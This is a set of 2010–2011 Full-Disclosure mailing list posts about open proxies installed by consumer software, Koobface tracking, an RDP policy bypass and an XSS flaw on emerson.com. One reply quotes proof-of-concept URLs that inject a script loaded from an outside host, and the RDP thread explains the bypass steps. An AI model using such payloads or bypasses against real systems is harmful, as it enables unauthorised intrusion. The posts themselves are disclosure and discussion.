[Full-disclosure] McAfee Relay Server Product Installs Open Proxy On Consumer PCs
Earlier today I noticed I was getting a lot of TCP port 6515 proxies on The List (http://www.mrhinkydink.com/proxies.htm ) Curious, I checked one it and it gave me a VIA header of 1.1 Fran-PC (McAfee Relay Server 5.2.3) Then I took a peek at the database. Nearly 1900 of these things since December 1st, 2011. Although the name of the PC above is a dead giveaway that this is some sort of consumer product ([name-of-owner]-PC is the default Windows machine name created during setup), a quick check of the DNS names of these boxes confirms they are all on residential IP addresses. So what is McAfee Relay Server? I'm guessing it's one of those snarky products they stick you with whenever you buy a new PC. This makes sense, since December is a big month for new PCs. But why install it as an open proxy? If it's a security product I hope it's a honeypot. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS Vulnerability in www.emerson.com
That... ahem... particular company has had that particular page (/MCS/email.apsx) in one form or another for a long time, since the late 90s at least, when it was a cgi app. IIRC, at one time you could SPAM anyone through it, but they learned their lesson and now you can only SPAM the company's employees. Considering the business they're in (think SCADA related) this could be a Bad Thing. The XSS is just the icing on the cake. I find it interesting that they upgraded it to SharePoint. It's an in-house app, one of several. I believe the security model used to be no one knows the URL. I'm guessing you're a contractor for that particular company because, after all, no one knows the URL. On Mon, 2011-09-05 at 02:00 +0530, Madhur Ahuja wrote: One of the pages in Emerson site are rendering the query string parameter without any inspection. This makes it possible to inject malicious content as shown below: http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg% 20src='http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=% 22http://madhur.github.com/files/js/site.js%22%20type=% 22text/javascript%22%3E -- Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] China - the land of open proxies
In July, hundreds of Chinese proxies on port 8909 started showing up every day on public proxy lists. In August the daily numbers were in the thousands. Here is the list I collected during that period. There are 135K proxies in this file (text, tab delimited, ~8 megs). http://www.mrhinkydink.com/utmods/135k.txt You may want to right-click and save as. This is offered as data you may be able to use for forensic purposes or router block lists. Most of these proxies are currently offline. When they are online, they're very good proxies. I believe this is similar to the PPLiveVA issue with TCP port 9415 that I noted back in April. http://mrhinkydink.blogspot.com/2011/04/insecure-defaults-in-ppliveav-client.html New port 9415 proxies stopped showing up on proxy lists when 8909 began to take over, which leads me to believe this is the hot new media client (either Youku or QQ) in Chinese-speaking countries. --Mr. Hinky Dink walk like a mannequin roll like a tyre act on reaction dodge the Big Spud Fryer http://mrhinkydink.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yet Another Chinese Multimedia Player Supplies Thousands Of Open Proxies
On Sun, 2011-08-07 at 16:27 -0400, valdis.kletni...@vt.edu wrote: On Sat, 06 Aug 2011 19:59:23 EDT, Mr. Hinky Dink said: 23,000+ showed up in July. Over 16,000 new ones in the first week of August. Somebody doesn't get it. http://mrhinkydink.blogspot.com/2011/08/tcp-port-8909-proxies.html See also... http://mrhinkydink.blogspot.com/2011/04/insecure-defaults-in-ppliveav-client.html Doesn't get it? You're making the rash assumption it's not intentional. You yourself say Government spooks and contractors take note: you can use these to stage your false flag attacks!. Now take it one step further - what if they're intentionally open so the Chinese gov't can launch an attack through them and claim it was somebody else pulling a false flag attack? You think that's too devious? Go read up on who financed the research that lead to TOR - and *why* they financed it. (tl;dr: US Gov. financed it, so the US spooks could more easily fly under the wire mixed in with all the other nefarious people using TOR. So yes, it's patriotic to use TOR so it's even harder to use traffic analysis to track down our spooks. :) There's always the possibility that *I* don't get it. Because I'm SOMEBODY dammit! So... are you a spook or a contractor? Or both? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Yet Another Chinese Multimedia Player Supplies Thousands Of Open Proxies
23,000+ showed up in July. Over 16,000 new ones in the first week of August. Somebody doesn't get it. http://mrhinkydink.blogspot.com/2011/08/tcp-port-8909-proxies.html See also... http://mrhinkydink.blogspot.com/2011/04/insecure-defaults-in-ppliveav-client.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible RDP vulnerability
As far as RDP is concerned, it's much simpler (and more fun!) to host an Evil RDP Server than it is to hack into one. There is no end to the shenanigans you can create or the havoc you can wreak, if you're into that kind of thing (just sayin'... as a Big Time Security Professional™, I'm not). For instance, this low quailty, seldom seen, crappy video (barely) shows how you can get a virus/Trojan/worm/etc. if you are insane enough to attach your local drives to an untrusted RDP server (the popup at the end is the AV going off). http://www.youtube.com/watch?v=UwhqJSmYm_4 EXTRA CREDIT: devise a Group Policy that will prevent users from attaching their local drives to a remote RDP server. - Original Message - From: wicked clown To: Thor (Hammer of God) Cc: Full-Disclosure@lists.grok.org.uk Sent: Saturday, March 27, 2010 7:39 AM Subject: Re: [Full-disclosure] Possible RDP vulnerability I think we are two different pages :) what I was trying to show if you have a group policy that will only run a certain applications for example notepad.exe, the user is unable to access my computer, run or the start button or any other application. There would be a shortcut on the desktop for just notepad.exe for the user to execute. / ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible RDP vulnerability
In your case, had you answered the question correctly I would have promised to never (again) blog about you arguing with Craig S. Wright. However, it was a trick question. There is no way to do it with Group Policy (at least not with XP and Server 2003... maybe they changed that in Windows Vis7a and Server 2008, but I really haven't kept up with the tech). - Original Message - From: Thor (Hammer of God) t...@hammerofgod.com To: Mr. Hinky Dink d...@mrhinkydink.com; Full-Disclosure@lists.grok.org.uk Sent: Saturday, March 27, 2010 12:09 PM Subject: RE: [Full-disclosure] Possible RDP vulnerability Oh, sorry I read the question wrong. Just don't allow them to attach their local drives. Simple. Still, what do I win? t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible RDP vulnerability
There is a section in RCP-Tcp Properties on the server under Environment for Do not allow an initial program to be launched. Always show the desktop. - Original Message - From: wicked clown To: Full-Disclosure@lists.grok.org.uk Sent: Friday, March 26, 2010 5:04 AM Subject: [Full-disclosure] Possible RDP vulnerability Hi Guys, I think I possible may have found a vulnerability with using RDP / Terminal services on windows 2003. If you lock down a server and only allow users who connect to your RDP connection to run certain applications, users can bypass this and run ANY application they want. You can do this by modifying the RDP profile / shortcut and add your application to the alternate shell and the shell working directory. When the user connects now to the RDP server the banned application will execute upon logging on even though the user isn’t allowed to execute the application if the user logs on normally. This doesn’t work with cmd.exe but I have been able to execute internet explorer, down a modified cmd version, modify the RDP profile to execute the new cmd and it works like a charm. I have only been able to tested this on windows 2003 using a local policy and works like a treat. Even in the wild! I have done a quick basic video which can been seen here; http://www.tombstone-bbs.co.uk/v1d30z/rdp-hack2.swf Instead of modifying the RDP profile, I just added my application to the program tab.. I know the video is crappy but it’s just meant to give you an idea what I am talking about :) So in short, if anybody can access your server via RDP they are NOT restricted by the policy. I would be interested in any feed back about this possible exploit / vulnerability even if you don’t think it is.. or even better if someone knows how to defend againest it!! LOL! :) Cheers Wicked Clown. -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Hinky Dink Top 10 Koobface Infested Shitholes Report
Today I was inspired by The Norton Top 10 Riskiest Online Cities Report (http://norton.newslinevine.com/Riskiest_Online_Cities_Press_Release.pdf) so I decided to do my own press release with my own data (in light of recent events). - The Hinky Dink Top 10 Koobface Infested Shitholes Report Reveals Where Web 2.0's Most PWN3D Users Live Columbus, Ohio – March 22, 2010 – Mr. Hinky Dink, a Big Time Security Professional™ today released an analysis of the spread of the Koobface worm. Based on an exhaustive study of his database of over two and a half million open Web proxies collected over two years, Hinky's findings demonstrate where the most vulnerable social networking users can be found. The following are ranked the Hinky Top Ten Social Networking Shitholes: 1.Saint Louis 2.Chicago 3.Kansas City 4.Houston 5.Birmingham 6.Dallas 7.Oklahoma City 8.Los Angeles 9.Brooklyn 10.Columbus The complete report is available at http://www.mrhinkydink.com/Koobface%20Shithole%20Report%2003-22-2010.pdf - http://twitter.com/mrhinkydink http://mrhinkydink.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Setting the record straight on The Return of Koobface
Today I ran across this article... http://www.nst.com.my/Current_News/NST/articles/20100320160620/Article/index_html ... in which it is noted that Kaspersky Labs recently discovered the resurgence of the malicious programme (Koobface) and sounded the alarm. Gentlemen, I beg to differ. I first mentioned the resurgence of Koobface on February 23rd, 2010 here... http://proxyobsession.net/?p=827 I admit I did not sound the alarm. I simply lol'd because Koobface is one sign of the EPIC FAIL of the security industry. Just ask Dancho Danchev. He's made quite a name for himself by doing absolutely nothing worthwhile about Koobface except raising his won blood pressure spewing vitriol about The Koobface Gang (sorry, Danny, but I'm not part of the gang. I'm just another BlogSpot loser). For those wondering, I am not a hacker. I am a Big Time Security Professional (you may remember me if you Google Websense Policy Bypass - unfortuantely those bastards at Warner Brothers killed the soundtrack to my YouTube video). But I am at heart a skeptic, disappointed at what the security industry has become. I created my Proxy List (http://www.mrhinkydink.com/proxies.htm) two years ago as a tool for an as yet unpublished paper on open SOCKS proxies in the wild. It has had the unintended side effect of tracking the spread of Koobface, since Kooberz proxies exclusively (until this month) appear on TCP port 8085. And it has tracked it quite well. I'd like to take this opportunity to say Hello (no, not GREETZ) to all the Cameroonian Puppy Scammers (papa Dollars, STARVO, Dabbleed, et. al.) who abuse my proxy list. Enough is enough. Get a real job, fellas. http://proxyobession.net http://mrhinkydink.blogspot.com http://twitter.com/mrhinkydink : (Follow me! I have no friends!) : ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Setting the record straight on The Return ofKoobface
Absolutely you are correct, but if you check the blog there are further references up to last Friday. It was a tremendous, jaw-dropping flood of Kooberz proxies the last two weeks. And it's still coming. The point is us Little Guys are paying attention, too. And sometimes we catch this shit before the Big Boys like Dancho and Kaspersky wake up and smell the coffee. Since February I've been wondering Why The Hell I hadn't heard anything in the ITsec press on this new resurgence. Did they hold back so Dancho could publish his Ten Things You Didn't Know About The Koobface Gang article? Or so Microsoft could gloat over taking down the Wimpy Waledac botnet? Is the Good News always published before the Bad News in the security industry press release cycle? The fact remains, Koobface marches on and the security industry can't stop it. Period. I will be among the first to jump up and down and yell RA! when someone takes it down, but it ain't going to happen soon. All I can do is sit back and watch while the Big Boys get their headlines. BTW, I don't consider myself bitter. I'm what you might call tangy. Thanks for your support, Hinky - Original Message - From: J Roger To: full-disclosure@lists.grok.org.uk Sent: Saturday, March 20, 2010 3:28 PM Subject: Re: [Full-disclosure] Setting the record straight on The Return ofKoobface This reads as waaa i noticed this first and didn't think much of it but now that someone else is making a big deal, i want my credit. Maybe you reported on it first on your blog, with a single sentence that wasn't even the primary focus of the post. Regardless if an up rise in koobface is significantly news worthy or not, you apparently failed to draw enough attention (or the right attention) to it at the time. In other words, maybe you did it first, but someone else did it better. What's more valuable to an enterprise, someone that quickly writes a risk assessment that's so sloppy the management with authority to act on the findings don't even bother to read it, or someone that takes the time to write a report on the same findings that actually speaks to the business and be able to make positive changes happen. You talk about being bitter towards the security industry (which IS understandable) but maybe it's time to reflect back a little on yourself. Maybe it's not ALL the industries fault. Maybe the sources of your bitterness have a little something to do with your inability to make enough of the right things happen. Sure you're a Big Time Security Professional, but maybe your blog wasn't enough to get the word out. Maybe you felt it wasn't even worth getting the word out or sounding any alarms. If that's the case though, don't go back now and try to take credit. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/